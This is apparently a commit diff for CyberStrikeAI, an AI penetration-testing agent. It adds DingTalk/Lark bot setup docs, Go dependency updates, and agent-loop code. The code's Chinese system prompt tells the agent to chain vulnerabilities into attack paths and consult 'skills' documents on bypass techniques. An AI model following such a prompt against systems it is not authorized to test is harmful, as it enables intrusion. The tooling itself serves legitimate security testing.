| **新对话** (new) | Start a new conversation |
| **清空** (clear) | Clear current context (same effect as new conversation) |
| **当前** (current) | Show current conversation ID and title |
| **停止** (stop) | Abort the currently running task |
| **角色** or **角色列表** (roles) | List all available roles (penetration testing, CTF, Web scan, etc.) |
| **角色 \<roleName\>** or **切换角色 \<roleName\>** | Switch to the specified role |
| **删除 \<conversationID\>** | Delete the specified conversation |
| **版本** (version) | Show current CyberStrikeAI version |
Any other text is sent to the AI as a user message, same as in the web UI (e.g. penetration testing, security analysis).
---
## 5. How to use (do I need to @ the bot?)
- **Direct chat (recommended)**: In DingTalk or Lark, **search for the bot and open a direct chat**. Type “帮助” or any message; **no @ needed**.
- **Group chat**: If the bot is in a group, only messages that **@ the bot** are received and answered; other group messages are ignored.
Summary: **Direct chat** — just send; **in a group** — @ the bot first, then send.
---
## 6. Recommended flow (so you dont skip steps)
1. **In the open platform**: Complete app creation, copy credentials, enable the bot (DingTalk: **Stream mode**), set permissions, and publish (Section 3).
2. **In CyberStrikeAI**: System settings → Robot settings → Enable the platform, paste Client ID/App ID and Client Secret/App Secret → **Apply configuration**.
3. **Restart the CyberStrikeAI process** (otherwise the long-lived connection is not established).
4. **On your phone**: Open DingTalk or Lark, find the bot (direct chat or @ in a group), send “帮助” or any message to test.
If the bot does not respond, see **Section 9 (troubleshooting)** and **Section 10 (common pitfalls)**.
---
## 7. Config file example
Example `robots` section in `config.yaml`:
```yaml
robots:
dingtalk:
enabled: true
client_id: "your_dingtalk_app_key"
client_secret: "your_dingtalk_app_secret"
lark:
enabled: true
app_id: "your_lark_app_id"
app_secret: "your_lark_app_secret"
verify_token: ""
```
**Restart the app** after changes; the long-lived connection is created at startup.
---
## 8. Testing without DingTalk/Lark installed
You can verify bot logic with the **test API** (no DingTalk/Lark client needed):
1. Log in to the CyberStrikeAI web UI (so you have a session).
2. Call the test endpoint with curl (include your session Cookie):
```bash
# Replace YOUR_COOKIE with the Cookie from your browser (F12 → Network → any request → Request headers → Cookie)
curl -X POST "http://localhost:8080/api/robot/test" \
-H "Content-Type: application/json" \
-H "Cookie: YOUR_COOKIE" \
-d '{"platform":"dingtalk","user_id":"test_user","text":"帮助"}'
```
If the JSON response contains `"reply":"【CyberStrikeAI 机器人命令】..."`, command handling works. You can also try `"text":"列表"` or `"text":"当前"`.
API: `POST /api/robot/test` (requires login). Body: `{"platform":"optional","user_id":"optional","text":"required"}`. Response: `{"reply":"..."}`.
---
## 9. DingTalk: no response when sending messages
Check in this order:
0. **After laptop sleep or network drop**
DingTalk and Lark both use long-lived connections; they break when the machine sleeps or the network drops. The app **auto-reconnects** (retries within about 560 seconds). After wake or network recovery, wait a moment before sending; if there is still no response, restart the CyberStrikeAI process.
1. **Client ID / Client Secret match the open platform exactly**
Copy from “Credentials and basic info”; avoid typing. Watch **0** vs **o** and **1** vs **l** (e.g. `ding9gf9tiozuc504aer` has **504**, not 5o4).
2. **Did you restart after saving?**
The long-lived connection is created at **startup**. “Apply configuration” only updates the config file; you **must restart the CyberStrikeAI process** for the DingTalk connection to start.
3. **Application logs**
- On startup you should see: `钉钉 Stream 正在连接…`, `钉钉 Stream 已启动(无需公网),等待收消息`.
- If you see `钉钉 Stream 长连接退出` with an error, its usually wrong **Client ID / Client Secret** or **Stream not enabled** in the open platform.
- After sending a message in DingTalk, you should see `钉钉收到消息` in the logs; if not, the platform is not pushing to this app (check that the bot is enabled and **Stream mode** is selected).
4. **Open platform**
The app must be **published**. Under “Robot” you must enable **Stream** for receiving messages (HTTP callback only is not enough). Permission management must include robot receive/send message permissions.
---
## 10. Common pitfalls
- **Wrong bot type**: The “Custom” bot added in a DingTalk **group** (Webhook + sign secret) **cannot** be used for two-way chat. Only the **enterprise internal app** bot from the open platform is supported.
- **Saved but not restarted**: After changing robot settings in CyberStrikeAI you **must restart** the app, or the long-lived connection will not be established.
- **Client ID typo**: If the platform shows `504`, use `504` (not `5o4`); prefer copy/paste.
- **DingTalk: only HTTP callback, no Stream**: This app receives messages via **Stream**. In the open platform, message reception must be **Stream mode**.
- **App not published**: After changing the bot or permissions in the open platform, **publish a new version** under “Version management and release”, or changes wont apply.
---
## 11. Notes
- DingTalk and Lark: **text messages only**; other types (e.g. image, voice) are not supported and may be ignored.
- Conversations are shared with the web UI: conversations created from the bot appear in the web “Conversations” list and vice versa.
- Bot execution uses the same logic as **`/api/agent-loop/stream`** (progress callbacks, process details stored in the DB); only the final reply is sent back to DingTalk/Lark in one message (no SSE to the client).
+17 -1
View File
@@ -1,13 +1,21 @@
module cyberstrike-ai
go 1.21
go 1.24.0
toolchain go1.24.4
require (
github.com/creack/pty v1.1.24
github.com/gin-gonic/gin v1.9.1
github.com/google/uuid v1.5.0
github.com/gorilla/websocket v1.5.0
github.com/larksuite/oapi-sdk-go/v3 v3.4.22
github.com/mattn/go-sqlite3 v1.14.18
github.com/modelcontextprotocol/go-sdk v1.2.0
github.com/open-dingtalk/dingtalk-stream-sdk-go v0.9.1
github.com/pkoukk/tiktoken-go v0.1.8
go.uber.org/zap v1.26.0
golang.org/x/time v0.14.0
gopkg.in/yaml.v3 v3.0.1
)
@@ -21,6 +29,8 @@ require (
github.com/go-playground/universal-translator v0.18.1 // indirect
github.com/go-playground/validator/v10 v10.14.0 // indirect
github.com/goccy/go-json v0.10.2 // indirect
github.com/gogo/protobuf v1.3.2 // indirect
github.com/google/jsonschema-go v0.3.0 // indirect
github.com/json-iterator/go v1.1.12 // indirect
github.com/klauspost/cpuid/v2 v2.2.4 // indirect
github.com/leodido/go-urn v1.2.4 // indirect
@@ -30,11 +40,17 @@ require (
github.com/pelletier/go-toml/v2 v2.0.8 // indirect
github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
github.com/ugorji/go/codec v1.2.11 // indirect
github.com/yosida95/uritemplate/v3 v3.0.2 // indirect
go.uber.org/multierr v1.11.0 // indirect
golang.org/x/arch v0.3.0 // indirect
golang.org/x/crypto v0.14.0 // indirect
golang.org/x/net v0.17.0 // indirect
golang.org/x/oauth2 v0.30.0 // indirect
golang.org/x/sys v0.13.0 // indirect
golang.org/x/text v0.13.0 // indirect
google.golang.org/protobuf v1.30.0 // indirect
)
// 修复钉钉 Stream SDK 在长连接断开(熄屏/网络中断)后 "panic: send on closed channel" 问题
// 详见: https://github.com/open-dingtalk/dingtalk-stream-sdk-go/issues/28
replace github.com/open-dingtalk/dingtalk-stream-sdk-go => github.com/uouuou/dingtalk-stream-sdk-go v0.0.0-20250626025113-079132acc406
+54 -2
View File
@@ -4,6 +4,8 @@ github.com/bytedance/sonic v1.9.1/go.mod h1:i736AoUSYt75HyZLoJW9ERYxcy6eaN6h4BZX
github.com/chenzhuoyu/base64x v0.0.0-20211019084208-fb5309c8db06/go.mod h1:DH46F32mSOjUmXrMHnKwZdA8wcEefY7UVqBKYGjpdQY=
github.com/chenzhuoyu/base64x v0.0.0-20221115062448-fe3a3abad311 h1:qSGYFH7+jGhDF8vLC+iwCD4WpbV1EBDSzWkJODFLams=
github.com/chenzhuoyu/base64x v0.0.0-20221115062448-fe3a3abad311/go.mod h1:b583jCggY9gE99b6G5LEC39OIiVsWj+R97kbl5odCEk=
github.com/creack/pty v1.1.24 h1:bJrF4RRfyJnbTJqzRLHzcGaZK1NeM5kTC9jGgovnR1s=
github.com/creack/pty v1.1.24/go.mod h1:08sCNb52WyoAwi2QDyzUCTgcvVFhUzewun7wtTfvcwE=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
@@ -25,23 +27,38 @@ github.com/go-playground/validator/v10 v10.14.0 h1:vgvQWe3XCz3gIeFDm/HnTIbj6UGmg
github.com/go-playground/validator/v10 v10.14.0/go.mod h1:9iXMNT7sEkjXb0I+enO7QXmzG6QCsPWY4zveKFVRSyU=
github.com/goccy/go-json v0.10.2 h1:CrxCmQqYDkv1z7lO7Wbh2HN93uovUHgrECaO5ZrCXAU=
github.com/goccy/go-json v0.10.2/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I=
github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
github.com/golang-jwt/jwt/v5 v5.2.2 h1:Rl4B7itRWVtYIHFrSNd7vhTiz9UpLdi6gZhZ3wEeDy8=
github.com/golang-jwt/jwt/v5 v5.2.2/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU=
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
github.com/google/jsonschema-go v0.3.0 h1:6AH2TxVNtk3IlvkkhjrtbUc4S8AvO0Xii0DxIygDg+Q=
github.com/google/jsonschema-go v0.3.0/go.mod h1:r5quNTdLOYEz95Ru18zA0ydNbBuYoo9tgaYcxEYhJVE=
github.com/google/uuid v1.5.0 h1:1p67kYwdtXjb0gL0BPiP1Av9wiZPo5A8z2cWkTZ+eyU=
github.com/google/uuid v1.5.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
github.com/klauspost/cpuid/v2 v2.0.9/go.mod h1:FInQzS24/EEf25PyTYn52gqo7WaD8xa0213Md/qVLRg=
github.com/klauspost/cpuid/v2 v2.2.4 h1:acbojRNwl3o09bUq+yDCtZFc1aiwaAAxtcn8YkZXnvk=
github.com/klauspost/cpuid/v2 v2.2.4/go.mod h1:RVVoqg1df56z8g3pUjL/3lE5UfnlrJX8tyFgg4nqhuY=
github.com/larksuite/oapi-sdk-go/v3 v3.4.22 h1:57daKuslQPX9X3hC2idc5bu8bl2krfsBGWGJ6b5FlD8=
github.com/larksuite/oapi-sdk-go/v3 v3.4.22/go.mod h1:ZEplY+kwuIrj/nqw5uSCINNATcH3KdxSN7y+UxYY5fI=
github.com/leodido/go-urn v1.2.4 h1:XlAE/cm/ms7TE/VMVoduSpNBoyc2dOxHs5MZSwAN63Q=
github.com/leodido/go-urn v1.2.4/go.mod h1:7ZrI8mTSeBSHl/UaRyKQW1qZeMgak41ANeCNaVckg+4=
github.com/mattn/go-isatty v0.0.19 h1:JITubQf0MOLdlGRuRq+jtsDlekdYPia9ZFsB8h/APPA=
github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
github.com/mattn/go-sqlite3 v1.14.18 h1:JL0eqdCOq6DJVNPSvArO/bIV9/P7fbGrV00LZHc+5aI=
github.com/mattn/go-sqlite3 v1.14.18/go.mod h1:2eHXhiwb8IkHr+BDWZGa96P6+rkvnG63S2DGjv9HUNg=
github.com/modelcontextprotocol/go-sdk v1.2.0 h1:Y23co09300CEk8iZ/tMxIX1dVmKZkzoSBZOpJwUnc/s=
github.com/modelcontextprotocol/go-sdk v1.2.0/go.mod h1:6fM3LCm3yV7pAs8isnKLn07oKtB0MP9LHd3DfAcKw10=
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
@@ -68,6 +85,12 @@ github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
github.com/ugorji/go/codec v1.2.11 h1:BMaWp1Bb6fHwEtbplGBGJ498wD+LKlNSl25MjdZY4dU=
github.com/ugorji/go/codec v1.2.11/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
github.com/uouuou/dingtalk-stream-sdk-go v0.0.0-20250626025113-079132acc406 h1:b72HNsEnmTRn7vhWGOfbWHAkA5RbRCk0Pbc56V2WAuY=
github.com/uouuou/dingtalk-stream-sdk-go v0.0.0-20250626025113-079132acc406/go.mod h1:ln3IqPYYocZbYvl9TAOrG/cxGR9xcn4pnZRLdCTEGEU=
github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4=
github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4=
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk=
go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo=
go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
@@ -77,18 +100,47 @@ go.uber.org/zap v1.26.0/go.mod h1:dtElttAiwGvoJ/vj4IwHBS/gXsEu/pZ50mUIRWuG0so=
golang.org/x/arch v0.0.0-20210923205945-b76863e36670/go.mod h1:5om86z9Hs0C8fWVUuoMHwpExlXzs5Tkyp9hOrfG7pp8=
golang.org/x/arch v0.3.0 h1:02VY4/ZcO/gBOH6PUaoiptASxtXU10jazRCP865E97k=
golang.org/x/arch v0.3.0/go.mod h1:5om86z9Hs0C8fWVUuoMHwpExlXzs5Tkyp9hOrfG7pp8=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.14.0 h1:wBqGXzWJW6m1XrIKlAH0Hs1JJ7+9KBwnIO8v66Q9cHc=
golang.org/x/crypto v0.14.0/go.mod h1:MVFd36DqK4CsrnJYDkBA3VC4m2GkXAM0PvzMCn4JQf4=
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI=
golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k=
golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI=
golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo=
golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng=
google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=

Before

Width:  |  Height:  |  Size: 9.0 KiB

After

Width:  |  Height:  |  Size: 9.0 KiB

Before

Width:  |  Height:  |  Size: 1.8 MiB

After

Width:  |  Height:  |  Size: 1.8 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 832 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 499 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 477 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 839 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 711 KiB

Before

Width:  |  Height:  |  Size: 317 KiB

After

Width:  |  Height:  |  Size: 317 KiB

BIN
View File
Binary file not shown.

After

Width:  |  Height:  |  Size: 656 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 326 KiB

View File

Before

Width:  |  Height:  |  Size: 32 KiB

After

Width:  |  Height:  |  Size: 32 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 493 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 598 KiB

BIN
View File
Binary file not shown.

Before

Width:  |  Height:  |  Size: 305 KiB

BIN
View File
Binary file not shown.

Before

Width:  |  Height:  |  Size: 280 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 74 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 335 KiB

BIN
View File
Binary file not shown.

Before

Width:  |  Height:  |  Size: 273 KiB

BIN
View File
Binary file not shown.

Before

Width:  |  Height:  |  Size: 543 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 382 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 506 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 246 KiB

+81 -17
View File
@@ -303,16 +303,17 @@ type ProgressCallback func(eventType, message string, data interface{})
// AgentLoop 执行Agent循环
func (a *Agent) AgentLoop(ctx context.Context, userInput string, historyMessages []ChatMessage) (*AgentLoopResult, error) {
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, "", nil, nil)
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, "", nil, nil, nil)
}
// AgentLoopWithConversationID 执行Agent循环(带对话ID
func (a *Agent) AgentLoopWithConversationID(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string) (*AgentLoopResult, error) {
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, conversationID, nil, nil)
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, conversationID, nil, nil, nil)
}
// AgentLoopWithProgress 执行Agent循环(带进度回调和对话ID)
func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string, callback ProgressCallback, roleTools []string) (*AgentLoopResult, error) {
// roleSkills: 角色配置的skills列表(用于在系统提示词中提示AI,但不硬编码内容)
func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string, callback ProgressCallback, roleTools []string, roleSkills []string) (*AgentLoopResult, error) {
// 设置当前对话ID
a.mu.Lock()
a.currentConversationID = conversationID
@@ -390,6 +391,17 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
- 将低影响问题串联成高影响攻击路径
- 牢记:单个高影响漏洞比几十个低严重度更有价值。
思考与推理要求:
调用工具前,在消息内容中提供5-10句话(50-150字)的思考,包含:
1. 当前测试目标和工具选择原因
2. 基于之前结果的上下文关联
3. 期望获得的测试结果
要求:
- ✅ 2-4句话清晰表达
- ✅ 包含关键决策依据
- ❌ 不要只写一句话
- ❌ 不要超过10句话
重要:当工具调用失败时,请遵循以下原则:
1. 仔细分析错误信息,理解失败的具体原因
@@ -411,7 +423,45 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
* low(低):影响较小,难以利用或影响范围有限
* info(信息):安全配置问题、信息泄露但不直接可利用等
- 确保漏洞证明(proof)包含足够的证据,如请求/响应、截图、命令输出等
- 在记录漏洞后,继续测试以发现更多问题`
- 在记录漏洞后,继续测试以发现更多问题
技能库(Skills):
- 系统提供了技能库(Skills),包含各种安全测试的专业技能和方法论文档
- 技能库与知识库的区别:
* 知识库(Knowledge Base):用于检索分散的知识片段,适合快速查找特定信息
* 技能库(Skills):包含完整的专业技能文档,适合深入学习某个领域的测试方法、工具使用、绕过技巧等
- 当你需要特定领域的专业技能时,可以使用以下工具按需获取:
* ` + builtin.ToolListSkills + `: 获取所有可用的skills列表,查看有哪些专业技能可用
* ` + builtin.ToolReadSkill + `: 读取指定skill的详细内容,获取该领域的专业技能文档
- 建议在执行相关任务前,先使用 ` + builtin.ToolListSkills + ` 查看可用skills,然后根据任务需要调用 ` + builtin.ToolReadSkill + ` 获取相关专业技能
- 例如:如果需要测试SQL注入,可以先调用 ` + builtin.ToolListSkills + ` 查看是否有sql-injection相关的skill,然后调用 ` + builtin.ToolReadSkill + ` 读取该skill的内容
- Skills内容包含完整的测试方法、工具使用、绕过技巧、最佳实践等专业技能文档,可以帮助你更专业地执行任务`
// 如果角色配置了skills,在系统提示词中提示AI(但不硬编码内容)
if len(roleSkills) > 0 {
var skillsHint strings.Builder
skillsHint.WriteString("\n\n本角色推荐使用的Skills\n")
for i, skillName := range roleSkills {
if i > 0 {
skillsHint.WriteString("、")
}
skillsHint.WriteString("`")
skillsHint.WriteString(skillName)
skillsHint.WriteString("`")
}
skillsHint.WriteString("\n- 这些skills包含了与本角色相关的专业技能文档,建议在执行相关任务时使用 `")
skillsHint.WriteString(builtin.ToolReadSkill)
skillsHint.WriteString("` 工具读取这些skills的内容")
skillsHint.WriteString("\n- 例如:`")
skillsHint.WriteString(builtin.ToolReadSkill)
skillsHint.WriteString("(skill_name=\"")
skillsHint.WriteString(roleSkills[0])
skillsHint.WriteString("\")` 可以读取第一个推荐skill的内容")
skillsHint.WriteString("\n- 注意:这些skills的内容不会自动注入,需要你根据任务需要主动调用 `")
skillsHint.WriteString(builtin.ToolReadSkill)
skillsHint.WriteString("` 工具获取")
systemPrompt += skillsHint.String()
}
messages := []ChatMessage{
{
@@ -479,8 +529,10 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
maxIterations := a.maxIterations
for i := 0; i < maxIterations; i++ {
// 每轮调用前先尝试压缩,防止历史消息持续膨胀
messages = a.applyMemoryCompression(ctx, messages)
// 先获取本轮可用工具并统计 tools token,再压缩,以便压缩时预留 tools 占用的空间
tools := a.getAvailableTools(roleTools)
toolsTokens := a.countToolsTokens(tools)
messages = a.applyMemoryCompression(ctx, messages, toolsTokens)
// 检查是否是最后一次迭代
isLastIteration := (i == maxIterations-1)
@@ -512,17 +564,17 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
default:
}
// 获取可用工具
tools := a.getAvailableTools(roleTools)
// 记录当前上下文的Token用量,展示压缩器运行状态
// 记录当前上下文的 Token 用量(messages + tools),展示压缩器运行状态
if a.memoryCompressor != nil {
totalTokens, systemCount, regularCount := a.memoryCompressor.totalTokensFor(messages)
messagesTokens, systemCount, regularCount := a.memoryCompressor.totalTokensFor(messages)
totalTokens := messagesTokens + toolsTokens
a.logger.Info("memory compressor context stats",
zap.Int("iteration", i+1),
zap.Int("messagesCount", len(messages)),
zap.Int("systemMessages", systemCount),
zap.Int("regularMessages", regularCount),
zap.Int("messagesTokens", messagesTokens),
zap.Int("toolsTokens", toolsTokens),
zap.Int("totalTokens", totalTokens),
zap.Int("maxTotalTokens", a.memoryCompressor.maxTotalTokens),
)
